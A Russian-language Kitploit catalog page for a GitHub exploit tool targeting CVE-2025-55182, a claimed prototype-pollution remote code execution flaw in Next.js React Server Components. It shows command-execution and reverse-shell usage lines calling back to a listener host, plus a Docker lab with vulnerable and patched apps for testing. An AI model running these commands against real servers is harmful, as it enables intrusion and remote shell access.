Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mr-destroyer/cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной НагрузкиЛаборатории и Практика
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

Эксплойт для CVE-2025-55182, обеспечивающий удалённое выполнение кода через загрязнение прототипа в React Server Components среды Next.js, с возможностями выполнения команд и получения обратной оболочки.

Репозиторий
1 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт RCE для React Server Components в Next.js

Эксплуатирует CVE-2025-55182 для удалённого выполнения кода через загрязнение прототипа.

Установка

root@kitploit:~
uv sync

Использование

Выполнение команд

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Реверс-шелл

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Параметры

  • -u, --url: URL/хост для проверки (обязательно)
  • -c, --cmd: Команда для выполнения
  • -r, --reverse: Включить режим реверс-шелла
  • -l, --lhost: Хост прослушивания для реверс-шелла
  • -p, --lport: Порт прослушивания для реверс-шелла
  • -P, --payload: Тип полезной нагрузки реверс-шелла: nc, nc-mkfifo, sh, perl (по умолчанию: nc)
  • --timeout: Таймаут запроса в секундах (по умолчанию: 10)

Примеры

root@kitploit:~
# Execute command
python3 exploit.py -u https://example.com -c "whoami"

# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo

Лабораторная среда

Каталог lab/ содержит полную Docker-среду для тестирования эксплойта.

Настройка

root@kitploit:~
cd lab
docker-compose up -d

Это запустит два сервиса:

  • vulnerable: Уязвимое приложение Next.js на порту 3011
  • patched: Исправленное приложение Next.js на порту 3012

Тестирование

root@kitploit:~
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"

# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
Скачать инструмент